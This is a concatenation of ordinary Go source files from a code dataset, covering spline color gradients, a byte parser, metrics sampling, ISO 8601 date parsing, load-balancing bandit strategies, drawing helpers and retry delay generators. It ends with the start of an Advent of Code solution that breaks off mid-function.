		m2 := (1. - tension) * (t2 - t1) * ((v1-v2)/(t1-t2) - (v1-v3)/(t1-t3) + (v2-v3)/(t2-t3))
		// Repeated values give zero knot spacing and hence NaN tangents;
		// flatten those to zero.
		if math.IsNaN(m1) {
			m1 = 0
		}
		if math.IsNaN(m2) {
			m2 = 0
		}
		// Cubic coefficients a*t^3 + b*t^2 + c*t + d for this segment.
		a := 2*v1 - 2*v2 + m1 + m2
		b := -3*v1 + 3*v2 - 2*m1 - m2
		c := m1
		d := v1
		segments = append(segments, [4]float64{a, b, c, d})
	}
	return catmullRomInterpolator{
		segments,
		pos,
	}
}
// at evaluates the spline at t by locating the segment whose position range
// contains t. Returns 0 when t falls outside every segment.
func (cr catmullRomInterpolator) at(t float64) float64 {
	for i := 0; i < len(cr.segments); i++ {
		p1 := cr.pos[i]
		p2 := cr.pos[i+1]
		if (p1 <= t) && (t <= p2) {
			seg := cr.segments[i]
			t1 := (t - p1) / (p2 - p1)
			t2 := t1 * t1
			t3 := t2 * t1
			return seg[0]*t3 + seg[1]*t2 + seg[2]*t1 + seg[3]
		}
	}
	return 0
}
// basis evaluates the uniform cubic B-spline blend of the four control
// values v0..v3 at parameter t1 in [0, 1].
// Adapted from https://github.com/d3/d3-interpolate/blob/master/src/basis.js
func basis(t1, v0, v1, v2, v3 float64) float64 {
	t2 := t1 * t1
	t3 := t2 * t1
	w0 := 1 - 3*t1 + 3*t2 - t3
	w1 := 4 - 6*t2 + 3*t3
	w2 := 1 + 3*t1 + 3*t2 - 3*t3
	return (w0*v0 + w1*v1 + w2*v2 + t3*v3) / 6
}
// basisInterpolator evaluates a uniform B-spline through the given values.
type basisInterpolator struct {
	values []float64
	pos    []float64
}
// newBasisInterpolator bundles values with their positions.
func newBasisInterpolator(values, pos []float64) basisInterpolator {
	return basisInterpolator{
		values, pos,
	}
}
// at evaluates the B-spline at t; the containing segment is found by a
// linear scan, and endpoints are mirrored to supply outer control points.
// Returns 0 when t is outside every segment.
func (b basisInterpolator) at(t float64) float64 {
	n := len(b.values) - 1
	for i := 0; i < n; i++ {
		p1 := b.pos[i]
		p2 := b.pos[i+1]
		if (p1 <= t) && (t <= p2) {
			t := (t - p1) / (p2 - p1)
			v1 := b.values[i]
			v2 := b.values[i+1]
			var v0, v3 float64
			if i > 0 {
				v0 = b.values[i-1]
			} else {
				v0 = 2*v1 - v2
			}
			if i < (n - 1) {
				v3 = b.values[i+2]
			} else {
				v3 = 2*v2 - v1
			}
			return basis(t, v0, v1, v2, v3)
		}
	}
	return 0
}
// splineGradient is a gradient backed by three per-channel spline
// interpolators in the chosen blend color space.
type splineGradient struct {
	a    interpolator
	b    interpolator
	c    interpolator
	dmin float64
	dmax float64
	mode BlendMode
}
// At returns the gradient color at t. t is clamped to [dmin, dmax]; NaN
// yields black. Channel values are converted back from the blend space,
// clamping where the space can produce out-of-gamut colors.
func (s splineGradient) At(t float64) colorful.Color {
	if math.IsNaN(t) {
		return colorful.Color{R: 0, G: 0, B: 0}
	}
	t = math.Max(s.dmin, math.Min(s.dmax, t))
	switch s.mode {
	case BlendLinearRgb:
		return colorful.LinearRgb(s.a.at(t), s.b.at(t), s.c.at(t))
	case BlendLab:
		return colorful.Lab(s.a.at(t), s.b.at(t), s.c.at(t)).Clamped()
	case BlendLuv:
		return colorful.Luv(s.a.at(t), s.b.at(t), s.c.at(t)).Clamped()
	case BlendHcl:
		return colorful.Hcl(s.a.at(t), s.b.at(t), s.c.at(t)).Clamped()
	case BlendHsv:
		return colorful.Hsv(s.a.at(t), s.b.at(t), s.c.at(t))
	case BlendOklab:
		r, g, b := oklabToLrgb(s.a.at(t), s.b.at(t), s.c.at(t))
		return colorful.LinearRgb(r, g, b).Clamped()
	default:
		return colorful.Color{R: s.a.at(t), G: s.b.at(t), B: s.c.at(t)}
	}
}
// newSplineGradient builds a Gradient that interpolates colors (placed at
// the given positions) with either B-spline or Catmull-Rom splines, channel
// by channel, in the chosen blend color space.
func newSplineGradient(colors []colorful.Color, pos []float64, space BlendMode, interpolation Interpolation) Gradient {
	n := len(colors)
	// Decompose each color into the three channels of the blend space.
	a := make([]float64, n)
	b := make([]float64, n)
	c := make([]float64, n)
	for i, col := range colors {
		var c1, c2, c3 float64
		switch space {
		case BlendLinearRgb:
			c1, c2, c3 = col.LinearRgb()
		case BlendLab:
			c1, c2, c3 = col.Lab()
		case BlendLuv:
			c1, c2, c3 = col.Luv()
		case BlendHcl:
			c1, c2, c3 = col.Hcl()
		case BlendHsv:
			c1, c2, c3 = col.Hsv()
		case BlendOklab:
			lr, lg, lb := col.LinearRgb()
			c1, c2, c3 = lrgbToOklab(lr, lg, lb)
		case BlendRgb:
			c1, c2, c3 = col.R, col.G, col.B
		}
		a[i] = c1
		b[i] = c2
		c[i] = c3
	}
	dmin := pos[0]
	dmax := pos[n-1]
	var gradbase gradientBase
	switch interpolation {
	case InterpolationBasis:
		gradbase = splineGradient{
			a:    newBasisInterpolator(a, pos),
			b:    newBasisInterpolator(b, pos),
			c:    newBasisInterpolator(c, pos),
			dmin: dmin,
			dmax: dmax,
			mode: space,
		}
	case InterpolationCatmullRom:
		gradbase = splineGradient{
			a:    newCatmullRomInterpolator(a, pos),
			b:    newCatmullRomInterpolator(b, pos),
			c:    newCatmullRomInterpolator(c, pos),
			dmin: dmin,
			dmax: dmax,
			mode: space,
		}
	}
	return Gradient{
		grad: gradbase,
		dmin: dmin,
		dmax: dmax,
	}
}
// presetSpline builds a basis-spline RGB gradient from CSS color strings,
// evenly spaced over [0, 1]. Unparseable colors are silently skipped.
func presetSpline(htmlColors []string) Gradient {
	var colors []colorful.Color
	for _, s := range htmlColors {
		c, err := csscolorparser.Parse(s)
		if err == nil {
			colors = append(colors, colorful.Color{R: c.R, G: c.G, B: c.B})
		}
	}
	pos := linspace(0, 1, uint(len(colors)))
	return newSplineGradient(colors, pos, BlendRgb, InterpolationBasis)
} | spline.go | 0.638497 | 0.468122 | spline.go | starcoder |
package pars
import (
"bytes"
"fmt"
"strings"
"github.com/go-ascii/ascii"
)
// Byte creates a Parser which will attempt to match the next single byte.
// If no bytes are given, it will match any byte.
// Otherwise, the given bytes will be tested for a match.
func Byte(p ...byte) Parser {
	switch len(p) {
	case 0:
		// No candidates given: any single byte matches.
		return func(state *State, result *Result) error {
			if err := state.Request(1); err != nil {
				return NewNestedError("Byte", err)
			}
			result.SetToken([]byte{state.Buffer()[0]})
			state.Advance()
			return nil
		}
	case 1:
		// Single candidate: compare the next byte directly.
		e := p[0]
		rep := ascii.Rep(e)
		name := fmt.Sprintf("Byte(%s)", rep)
		what := fmt.Sprintf("expected `%s`", rep)
		return func(state *State, result *Result) error {
			c, err := Next(state)
			if err != nil {
				return NewNestedError(name, err)
			}
			if c != e {
				return NewError(what, state.Position())
			}
			result.SetToken([]byte{c})
			state.Advance()
			return nil
		}
	default:
		// Multiple candidates: accept any byte contained in the set.
		reps := strings.Join(ascii.Reps(p), ", ")
		name := fmt.Sprintf("Byte(%s)", reps)
		what := fmt.Sprintf("expected one of [%s]", reps)
		s := string(p)
		mismatch := func(c byte) bool { return strings.IndexByte(s, c) < 0 }
		return func(state *State, result *Result) error {
			c, err := Next(state)
			if err != nil {
				return NewNestedError(name, err)
			}
			if mismatch(c) {
				return NewError(what, state.Position())
			}
			result.SetToken([]byte{c})
			state.Advance()
			return nil
		}
	}
}
// ByteRange creates a Parser which will attempt to match a byte between the
// given range inclusively. A degenerate range where begin == end matches
// exactly that single byte (previously this case panicked).
// Panics if begin > end.
func ByteRange(begin, end byte) Parser {
	if begin > end {
		panic("invalid byte range")
	}
	rbegin, rend := ascii.Rep(begin), ascii.Rep(end)
	name := fmt.Sprintf("ByteRange(%s, %s)", rbegin, rend)
	what := fmt.Sprintf("expected in range %s-%s", rbegin, rend)
	return func(state *State, result *Result) error {
		c, err := Next(state)
		if err != nil {
			return NewNestedError(name, err)
		}
		if c < begin || end < c {
			return NewError(what, state.Position())
		}
		result.SetToken([]byte{c})
		state.Advance()
		return nil
	}
}
// Bytes creates a Parser which will attempt to match the given sequence of bytes.
func Bytes(p []byte) Parser {
reps := fmt.Sprintf("[%s]", strings.Join(ascii.Reps(p), ", "))
name := fmt.Sprintf("Bytes([%s])", reps)
what := fmt.Sprintf("expected [%s]", reps)
return func(state *State, result *Result) error {
if err := state.Request(len(p)); err != nil {
return NewNestedError(name, err)
}
if !bytes.Equal(state.Buffer(), p) {
return NewError(what, state.Position())
}
result.SetToken(p)
state.Advance()
return nil
}
} | bytes.go | 0.679072 | 0.424591 | bytes.go | starcoder |
package stats
import (
"math/rand"
"sync"
"sync/atomic"
"time"
)
// Measurer represents a monitoring contract.
type Measurer interface {
	Snapshotter
	Measure(name string, value int32)
	MeasureElapsed(name string, start time.Time)
	MeasureRuntime()
	Tag(name, tag string)
}
// Metric maintains a combination of a gauge and a statistically-significant selection
// of the values from a stream. This is essentially a combination of a histogram, gauge
// and a counter.
type Metric struct {
	sync.Mutex
	// data is the fixed-size reservoir used to build a histogram.
	data sample
	// count is the total number of samples observed; written atomically.
	count int32
	// create is the Unix time at which the metric was (re)created.
	create int64
	// name is the name of the metric.
	name string
	// tag is an optional label for the metric (e.g. an IP address).
	tag string
}
const (
	// reservoirSize is the fixed number of samples retained for statistics.
	reservoirSize = 1024
)
// NewMetric creates a new metric with an empty reservoir and the creation
// time stamped to now.
func NewMetric(name string) *Metric {
	return &Metric{
		name: name,
		// make([]T, n) already sets cap == n; the explicit capacity
		// argument used before was redundant.
		data:   make([]int32, reservoirSize),
		create: time.Now().Unix(),
	}
}
// Reset clears the sample count and resets the creation time. The reservoir
// contents are left in place but become unreachable because count is zero.
func (m *Metric) Reset() {
	m.Lock()
	defer m.Unlock()
	atomic.StoreInt32(&m.count, 0)
	m.create = time.Now().Unix()
}
// Name returns the name of the histogram.
func (m *Metric) Name() string {
	return m.name
}
// Tag returns the associated tag of the metric.
func (m *Metric) Tag() string {
	m.Lock()
	defer m.Unlock()
	return m.tag
}
// Window returns start and end time of the histogram.
func (m *Metric) Window() (time.Time, time.Time) {
	return time.Unix(m.create, 0), time.Now()
}
// sample returns the portion of the reservoir that holds valid data.
// count is written with atomic.AddInt32 in Update, so it must be read
// atomically here too to avoid a data race; callers hold the mutex, which
// protects the data slice itself.
func (m *Metric) sample() sample {
	count := atomic.LoadInt32(&m.count)
	if count > reservoirSize {
		count = reservoirSize
	}
	return m.data[:count]
}
// Count returns the number of samples recorded, which may exceed the
// reservoir size. The counter is written with atomic.AddInt32 in Update,
// so it is read atomically here (no mutex required).
func (m *Metric) Count() int {
	return int(atomic.LoadInt32(&m.count))
}
// Max returns the maximum value in the sample, which may not be the maximum
// value ever to be part of the sample.
func (m *Metric) Max() int {
	m.Lock()
	defer m.Unlock()
	return m.sample().Max()
}
// Mean returns the mean of the values in the sample.
func (m *Metric) Mean() float64 {
	m.Lock()
	defer m.Unlock()
	return m.sample().Mean()
}
// Min returns the minimum value in the sample, which may not be the minimum
// value ever to be part of the sample.
func (m *Metric) Min() int {
	m.Lock()
	defer m.Unlock()
	return m.sample().Min()
}
// Quantile returns a slice of arbitrary quantiles of the sample.
func (m *Metric) Quantile(quantiles ...float64) []float64 {
	m.Lock()
	defer m.Unlock()
	return m.sample().Quantile(quantiles...)
}
// Snapshot returns a read-only copy of the sample.
func (m *Metric) Snapshot() *Snapshot {
	m.Lock()
	defer m.Unlock()
	// Copy the live portion of the reservoir so the caller is isolated
	// from concurrent updates.
	sample := m.sample()
	dest := make([]int32, len(sample))
	copy(dest, sample)
	return &Snapshot{
		Metric: m.name,
		Label:  m.tag,
		T0:     m.create,
		T1:     time.Now().Unix(),
		Amount: m.count,
		Sample: dest,
	}
}
// StdDev returns the standard deviation of the values in the sample.
func (m *Metric) StdDev() float64 {
	m.Lock()
	defer m.Unlock()
	return m.sample().StdDev()
}
// Variance returns the variance of the values in the sample.
func (m *Metric) Variance() float64 {
	m.Lock()
	defer m.Unlock()
	return m.sample().Variance()
}
// Rate returns an operations-per-second rate since the creation of the
// metric. Returns 0 when no measurable time has elapsed (or the clock went
// backwards), avoiding a division by zero that would yield ±Inf or NaN.
func (m *Metric) Rate() float64 {
	t0, t1 := m.Window()
	elapsed := t1.Sub(t0).Seconds()
	if elapsed <= 0 {
		return 0
	}
	return float64(m.Count()) / elapsed
}
// Update samples a new value into the metric using reservoir sampling: the
// first reservoirSize values fill the reservoir in order, after which each
// new value replaces a uniformly random slot with probability
// reservoirSize/count.
func (m *Metric) Update(v int32) {
	count := atomic.AddInt32(&m.count, 1)
	if count <= reservoirSize {
		m.Lock()
		m.data[count-1] = v
		m.Unlock()
		return
	}
	if r := int(rand.Int31n(count)); r < reservoirSize {
		m.Lock()
		m.data[r] = v
		m.Unlock()
		return
	}
}
// UpdateTag updates the associated metric tag.
func (m *Metric) UpdateTag(tag string) {
	m.Lock()
	m.tag = tag
	m.Unlock()
}
// Histogram creates a histogram of the current sample with the bins provided.
func (m *Metric) Histogram(bins ...int) []Bin {
	m.Lock()
	defer m.Unlock()
	return m.sample().Histogram(bins)
} | metric.go | 0.813313 | 0.457561 | metric.go | starcoder |
package util
import (
"fmt"
"regexp"
"strconv"
"time"
)
// Patterns for the supported ISO 8601 granularities, anchored to the whole
// input string. Compiled once at package init.
var yearRE = regexp.MustCompile(`^(\d{4})$`)
var monthRE = regexp.MustCompile(`^(\d{4})-(\d{2})$`)
var weekRE = regexp.MustCompile(`^(\d{4})-W(\d{2})$`)
var dayRE = regexp.MustCompile(`^(\d{4})-(\d{2})-(\d{2})$`)
var hourRE = regexp.MustCompile(`^(\d{4})-(\d{2})-(\d{2})T(\d{2})$`)
// Granularity indicates which ISO 8601 precision the input string used.
type Granularity int
const (
	Year Granularity = iota
	Month
	Week
	Day
	Hour
)
// ParseISO8601 is **not** a function to parse all and every kind of valid ISO 8601
// date, nor it's intended to be, since we don't need that.
// It recognizes year, month, week, day and hour granularities and returns
// the *end* of the given period (e.g. "2021" maps to 2021-12-31 23:59:59
// UTC), together with the granularity that matched.
func ParseISO8601(s string) (*time.Time, Granularity, error) {
	if matches := yearRE.FindStringSubmatch(s); len(matches) != 0 {
		year, err := parseYear(matches[1])
		if err != nil {
			return nil, -1, err
		}
		t := time.Date(year, time.December, daysOfMonth(time.December, year), 23, 59, 59, 0, time.UTC)
		return &t, Year, nil
	}
	if matches := monthRE.FindStringSubmatch(s); len(matches) != 0 {
		month, err := parseMonth(matches[2])
		if err != nil {
			return nil, -1, err
		}
		year, err := parseYear(matches[1])
		if err != nil {
			return nil, -1, err
		}
		// Use the real number of days in the month. The previous hard-coded
		// day 31 was normalized by time.Date into the following month for
		// shorter months (e.g. "2021-02" became March 3rd).
		t := time.Date(year, month, daysOfMonth(month, year), 23, 59, 59, 0, time.UTC)
		return &t, Month, nil
	}
	if matches := weekRE.FindStringSubmatch(s); len(matches) != 0 {
		week, err := parseWeek(matches[2])
		if err != nil {
			return nil, -1, err
		}
		year, err := parseYear(matches[1])
		if err != nil {
			return nil, -1, err
		}
		// Approximation: week N ends on day N*7 of the year (normalized by
		// time.Date), not the exact ISO week-date calendar.
		t := time.Date(year, time.January, week*7, 23, 59, 59, 0, time.UTC)
		return &t, Week, nil
	}
	if matches := dayRE.FindStringSubmatch(s); len(matches) != 0 {
		month, err := parseMonth(matches[2])
		if err != nil {
			return nil, -1, err
		}
		year, err := parseYear(matches[1])
		if err != nil {
			return nil, -1, err
		}
		day, err := parseDay(matches[3], daysOfMonth(month, year))
		if err != nil {
			return nil, -1, err
		}
		t := time.Date(year, month, day, 23, 59, 59, 0, time.UTC)
		return &t, Day, nil
	}
	if matches := hourRE.FindStringSubmatch(s); len(matches) != 0 {
		month, err := parseMonth(matches[2])
		if err != nil {
			return nil, -1, err
		}
		year, err := parseYear(matches[1])
		if err != nil {
			return nil, -1, err
		}
		hour, err := parseHour(matches[4])
		if err != nil {
			return nil, -1, err
		}
		day, err := parseDay(matches[3], daysOfMonth(month, year))
		if err != nil {
			return nil, -1, err
		}
		t := time.Date(year, month, day, hour, 59, 59, 0, time.UTC)
		return &t, Hour, nil
	}
	return nil, -1, fmt.Errorf("string does not match any formats")
}
func daysOfMonth(month time.Month, year int) int {
switch month {
case time.January:
return 31
case time.February:
if isLeap(year) {
return 29
} else {
return 28
}
case time.March:
return 31
case time.April:
return 30
case time.May:
return 31
case time.June:
return 30
case time.July:
return 31
case time.August:
return 31
case time.September:
return 30
case time.October:
return 31
case time.November:
return 30
case time.December:
return 31
default:
panic("invalid month!")
}
}
// isLeap reports whether year is a leap year in the Gregorian calendar:
// divisible by 4, except centuries, which must be divisible by 400.
func isLeap(year int) bool {
	return year%4 == 0 && (year%100 != 0 || year%400 == 0)
}
// atoi converts s to an int, panicking on failure. The panic is acceptable
// here because every call site passes a substring already matched by a
// digits-only regex group.
func atoi(s string) int {
	i, e := strconv.Atoi(s)
	if e != nil {
		// panic on error since atoi() will be called only after we parse it with regex
		// (hopefully `\d`!)
		panic(e.Error())
	}
	return i
}
// parseYear parses a 4-digit year. Years before 1583 are rejected; 1583
// itself is allowed, matching the error message (the previous `<=` check
// was off by one and rejected it).
func parseYear(s string) (int, error) {
	year := atoi(s)
	if year < 1583 {
		return 0, fmt.Errorf("years before 1583 are not allowed")
	}
	return year, nil
}
// parseMonth parses a 2-digit month in [01, 12].
func parseMonth(s string) (time.Month, error) {
	month := atoi(s)
	if month <= 0 || month >= 13 {
		return time.Month(-1), fmt.Errorf("month is not in range [01, 12]")
	}
	return time.Month(month), nil
}
// parseWeek parses a 2-digit week number in [01, 53].
func parseWeek(s string) (int, error) {
	week := atoi(s)
	if week <= 0 || week >= 54 {
		return -1, fmt.Errorf("week is not in range [01, 53]")
	}
	return week, nil
}
// parseDay parses a 2-digit day in [01, max], where max is the number of
// days in the month being parsed.
func parseDay(s string, max int) (int, error) {
	day := atoi(s)
	if day <= 0 || day > max {
		return -1, fmt.Errorf("day is not in range [01, %d]", max)
	}
	return day, nil
}
// parseHour parses a 2-digit hour in [00, 24]. NOTE(review): 24 is
// accepted; presumably intentional for ISO 8601's 24:00 notation, relying
// on time.Date normalization at the caller — confirm.
func parseHour(s string) (int, error) {
	hour := atoi(s)
	if hour <= -1 || hour >= 25 {
		return -1, fmt.Errorf("hour is not in range [00, 24]")
	}
	return hour, nil
} | internal/pkg/magneticod/util/iso8601.go | 0.534127 | 0.483039 | iso8601.go | starcoder |
package pooly
import (
"math"
"math/rand"
"sync"
)
// SoftMax strategy varies host selection probabilities as a graded function of their estimated scores.
// The temperature parameter is used to tweak the algorithm behavior:
// high temperature (+inf) means that all hosts will have nearly the same probability of being selected (equiprobable)
// low temperature (+0) favors a greedy selection and will tend to select hosts having the highest scores
type SoftMax struct {
temperature float32
}
// NewSoftMax creates a new SoftMax bandit strategy using the given
// temperature parameter.
func NewSoftMax(temperature float32) *SoftMax {
	s := &SoftMax{temperature: temperature}
	return s
}
// Select implements the Selecter interface.
//
// Hosts are weighted by exp(score/temperature) (softmax weighting) and one
// host is drawn at random from the resulting distribution. Hosts whose score
// is negative (no score recorded yet) get weight zero. If the weight sum is
// zero (nothing scored yet) the first host of the random map iteration is
// returned; an empty map yields nil.
func (s *SoftMax) Select(hosts map[string]*Host) *Host {
	var sum, prob float64
	exp := make(map[*Host]float64, len(hosts))
	// First pass: compute each host's unnormalized weight and their total.
	for _, h := range hosts {
		score := h.Score()
		if score < 0 { // no score recorded
			exp[h] = 0
			continue
		}
		exp[h] = math.Exp(score / float64(s.temperature))
		sum += exp[h]
	}
	// Second pass: inverse-CDF sampling — return the first host whose
	// cumulative normalized weight exceeds the uniform draw p.
	p := rand.Float64()
	for _, h := range hosts {
		if sum == 0 {
			return h
		}
		prob += exp[h] / sum // cumulative probability
		if prob > p {
			return h
		}
	}
	return nil
}
// EpsilonGreedy strategy selects generally the host having the highest score (greedy) but every once in a while
// it will randomly explore for other alternatives.
// The epsilon parameter (0-1) defines the proportion that the exploration phase occupies (e.g 1 for 100%).
type EpsilonGreedy struct {
epsilon float32
}
// NewEpsilonGreedy creates a new EpsilonGreedy bandit strategy with the
// given exploration rate.
func NewEpsilonGreedy(epsilon float32) *EpsilonGreedy {
	e := &EpsilonGreedy{epsilon: epsilon}
	return e
}
// Select implements the Selecter interface.
//
// With probability 1-epsilon the host with the highest score is returned
// (exploit); otherwise one host is chosen uniformly at random (explore).
// NOTE(review): rand.Intn panics when len(hosts) == 0, so callers presumably
// guarantee a non-empty map — confirm at the call sites.
func (e *EpsilonGreedy) Select(hosts map[string]*Host) (host *Host) {
	if rand.Float32() > e.epsilon { // exploit
		// max tracks the best score seen; ties keep the host seen last
		// in the (random) map iteration order.
		var max float64 = -1
		for _, h := range hosts {
			score := h.Score()
			if max = math.Max(max, score); max == score {
				host = h
			}
		}
	} else { // explore
		// Take the n-th host of the (randomly ordered) map iteration.
		i, n := 0, rand.Intn(len(hosts))
		for _, h := range hosts {
			if i == n {
				host = h
				break
			}
			i++
		}
	}
	return
}
// RoundRobin strategy selects hosts in circular manner with every request returning the next host in line.
type RoundRobin struct {
	sync.Mutex
	// nextSchedule is the slot whose host should be served next.
	nextSchedule int64
	// nextAvailSlot is the first slot not yet assigned to any host.
	nextAvailSlot int64
}
// NewRoundRobin creates a new RoundRobin bandit strategy with its schedule
// starting at the zero slot.
func NewRoundRobin() *RoundRobin {
	return &RoundRobin{}
}
// Select implements the Selecter interface.
//
// Hosts are served in a circular order. Instead of tracking scores, the
// strategy repurposes each host's score field as that host's round-robin
// slot (see the XXX note below); a host with a negative score (none
// recorded) is assigned the next free slot. The host whose slot equals
// nextSchedule is served; when no host holds that slot, the host with the
// nearest following slot (wrapping around) is served instead — presumably
// to cope with hosts having been removed from the map.
// NOTE(review): an empty hosts map leaves nextAvailSlot at 0 and the modulo
// at the bottom panics — confirm callers guarantee at least one host.
func (r *RoundRobin) Select(hosts map[string]*Host) (host *Host) {
	var offset int64
	var found bool
	// XXX score is not used, use it to attribute round robin scheduling instead
	// we don't need proper synchronization since score memoization isn't running here
	r.Lock()
	for _, h := range hosts {
		if h.score < 0 { // no score recorded
			h.score = float64(r.nextAvailSlot)
			r.nextAvailSlot++
		}
		if int64(h.score) == r.nextSchedule {
			offset = 1
			host = h
			found = true
		}
		if !found {
			// Find the next best schedule
			o := int64(h.score) - r.nextSchedule
			if o < 0 {
				o = r.nextAvailSlot + o
			}
			if offset == 0 || o < offset {
				offset = o + 1
				host = h
			}
		}
	}
	// Advance the schedule past the host just served, modulo the number of
	// assigned slots.
	r.nextSchedule = (r.nextSchedule + offset) % r.nextAvailSlot
	r.Unlock()
	return
} | bandit.go | 0.749362 | 0.53279 | bandit.go | starcoder |
package graphics
import (
"github.com/ironarachne/world/pkg/geometry"
"image"
"image/color"
"os"
"github.com/fogleman/gg"
)
// Pattern is a fill pattern: either a solid Color, or (when Type is
// "image") a tiled image loaded from PatternFileName.
type Pattern struct {
	Type string
	Color color.RGBA
	PatternFileName string
}
// Center returns the center point of a given rectangle
func Center(rect image.Rectangle) image.Point {
centerX := (rect.Max.X - rect.Min.X) / 2
centerY := (rect.Max.Y - rect.Min.Y) / 2
point := image.Point{
X: centerX,
Y: centerY,
}
return point
}
// CenteredRectangle returns a rectangle of the given dimensions centered on the given point
func CenteredRectangle(centerPoint image.Point, width int, height int) image.Rectangle {
rMinX := centerPoint.X - (width / 2)
rMinY := centerPoint.Y - (height / 2)
rMaxX := centerPoint.X + (width / 2)
rMaxY := centerPoint.Y + (height / 2)
centeredRectangle := image.Rectangle{
Min: image.Point{X: rMinX, Y: rMinY},
Max: image.Point{X: rMaxX, Y: rMaxY},
}
return centeredRectangle
}
// DrawCircle returns a copy of canvas with the given circle stroked in the
// given hex color at line width 1.
func DrawCircle(circle geometry.Circle, color string, canvas image.Image) image.Image {
	ctx := gg.NewContextForImage(canvas)
	ctx.SetHexColor(color)
	ctx.SetLineWidth(1)
	ctx.DrawCircle(circle.Center.X, circle.Center.Y, circle.Radius)
	ctx.Stroke()
	return ctx.Image()
}
// DrawEdges returns a copy of canvas with each of the given edges stroked in
// the given hex color.
func DrawEdges(edges []geometry.Edge, color string, canvas image.Image) image.Image {
	c := gg.NewContextForImage(canvas)
	// The stroke color is loop-invariant, so set it once rather than on
	// every iteration as before.
	c.SetHexColor(color)
	for _, e := range edges {
		c.DrawLine(e.A.X, e.A.Y, e.B.X, e.B.Y)
		c.Stroke()
	}
	newImage := c.Image()
	return newImage
}
// DrawEdge returns a copy of canvas with the single given edge stroked in
// the given hex color.
func DrawEdge(edge geometry.Edge, color string, canvas image.Image) image.Image {
	return DrawEdges([]geometry.Edge{edge}, color, canvas)
}
// DrawPoints returns a copy of canvas with each of the given points filled
// as a radius-1 dot in the given hex color.
func DrawPoints(points []geometry.Point, color string, canvas image.Image) image.Image {
	c := gg.NewContextForImage(canvas)
	// The fill color is loop-invariant, so set it once rather than on every
	// iteration as before.
	c.SetHexColor(color)
	for _, p := range points {
		c.DrawPoint(p.X, p.Y, 1)
		c.Fill()
	}
	newImage := c.Image()
	return newImage
}
// DrawPolygon returns a copy of canvas with the given polygon's edges
// stroked in the given hex color.
func DrawPolygon(polygon geometry.Polygon, color string, canvas image.Image) image.Image {
	return DrawEdges(polygon.Edges, color, canvas)
}
// DrawTriangle returns a copy of canvas with the given triangle's three
// edges stroked in the given hex color.
func DrawTriangle(triangle geometry.Triangle, color string, canvas image.Image) image.Image {
	edges := []geometry.Edge{triangle.AB, triangle.BC, triangle.CA}
	return DrawEdges(edges, color, canvas)
}
// LoadPNG loads a PNG image and returns it as an Image. The file is
// resolved relative to the WORLDAPI_DATA_PATH environment variable; a load
// failure panics.
func LoadPNG(path string) image.Image {
	dataPath := os.Getenv("WORLDAPI_DATA_PATH")
	im, err := gg.LoadPNG(dataPath + "/" + path)
	if err != nil {
		panic(err)
	}
	return im
}
// Fill fills the current path of dc with this pattern: a repeating image
// tile when Type is "image", a solid color otherwise. A tile that fails to
// load panics.
func (pattern Pattern) Fill(dc *gg.Context) {
	if pattern.Type == "image" {
		im, err := gg.LoadPNG("images/patterns/" + pattern.PatternFileName)
		if err != nil {
			panic(err)
		}
		// tile is the repeating surface pattern built from the PNG; a
		// distinct name avoids shadowing the receiver.
		tile := gg.NewSurfacePattern(im, gg.RepeatBoth)
		dc.SetFillStyle(tile)
	} else {
		dc.SetColor(pattern.Color)
	}
	dc.Fill()
}
// RenderFilledImage returns an image filled with a particular pattern.
// The PNG at path serves double duty: its alpha channel becomes a mask that
// limits where paint may land, and it is also the drawing surface. The whole
// canvas is then covered by one rectangle and filled through the mask.
func RenderFilledImage(path string, pattern Pattern) image.Image {
	maskImage := LoadPNG(path)
	mc := gg.NewContextForImage(maskImage)
	imageMask := mc.AsMask()
	dc := gg.NewContextForImage(maskImage)
	err := dc.SetMask(imageMask)
	if err != nil {
		panic("Could not set mask for pattern image")
	}
	dc.DrawRectangle(0, 0, float64(dc.Width()), float64(dc.Height()))
	pattern.Fill(dc)
	newImage := dc.Image()
	return newImage
} | pkg/graphics/graphics.go | 0.90941 | 0.695267 | graphics.go | starcoder |
package uhttp
import (
"math/rand"
"time"
)
// RepeatFunc generates delays between successive repeats of a request. prev will
// contain the value of the previous repeat (zero for the first). It should return
// nil to stop repeating, and should not be called after that.
type RepeatFunc func(prev time.Duration) *time.Duration
// RepeatGenerator produces RepeatFuncs.
type RepeatGenerator func() RepeatFunc
// RepeatAfter generates a RepeatFunc that returns delay num times, and then returns nil.
// If num is <= 0, this will return delay forever.
func RepeatAfter(delay time.Duration, num int) RepeatGenerator {
if num == 0 {
num = -1
}
return func() RepeatFunc {
num := num
return func(_ time.Duration) *time.Duration {
switch {
case num > 0:
num--
fallthrough
case num < 0:
return &delay
default:
return nil
}
}
}
}
// RepeatJoin generates a RepeatFunc that iterates over gens, instantiates RepeatFuncs from them,
// and returns values from each until they return nil, at which point it moves on to the next
// RepeatFunc. Returns nil once all resulting RepeatFunc instances have returned nil.
func RepeatJoin(gens ...RepeatGenerator) RepeatGenerator {
	return func() RepeatFunc {
		// i indexes the generator currently being drained; fn is the
		// RepeatFunc instantiated from it (nil until first use).
		var i int
		var fn RepeatFunc
		return func(prev time.Duration) *time.Duration {
			var got *time.Duration
			for i < len(gens) {
				if fn == nil { // "start" the repeater
					fn = gens[i]()
				}
				if got = fn(prev); got != nil {
					return got
				}
				// The current repeater is exhausted; move to the next one.
				i++
				fn = nil
			}
			return nil
		}
	}
}
// randomDuration returns a duration between low and high.
func randomDuration(low, high time.Duration) time.Duration {
if low > high {
low, high = high, low
}
return time.Duration(rand.Int63n(int64(high)-int64(low)) + int64(low))
}
// RepeatRandom generates a RepeatFunc that returns a random duration between [low, high), num
// times, and then returns nil. If num is 0, this will return delays forever.
func RepeatRandom(low, high time.Duration, num int) RepeatGenerator {
	if num == 0 {
		num = -1 // negative means "repeat forever"
	}
	return func() RepeatFunc {
		num := num // each generated RepeatFunc counts down independently
		return func(_ time.Duration) *time.Duration {
			switch {
			case num > 0:
				num--
				fallthrough
			case num < 0:
				// Still repeating: hand back a fresh random delay.
				d := randomDuration(low, high)
				return &d
			default:
				return nil
			}
		}
	}
} | repeat.go | 0.590425 | 0.460713 | repeat.go | starcoder |
package challenges
import (
"bufio"
"fmt"
"math"
"os"
)
// D6C1 - Day 6 Challenge 1
// Input (stdin) is a list of strings in the form of `346, 260`
// Output (stdout) is a single unsigned int: the size of the largest finite
// "closest-to" region, where finiteness is enforced by heavily penalizing
// any coordinate whose region touches the bounding box.
func D6C1() {
	var coords [][2]int
	maxX, maxY, minX, minY := 0, 0, 0, 0
	// Populate coords
	for in := bufio.NewScanner(os.Stdin); in.Scan(); {
		x, y := 0, 0
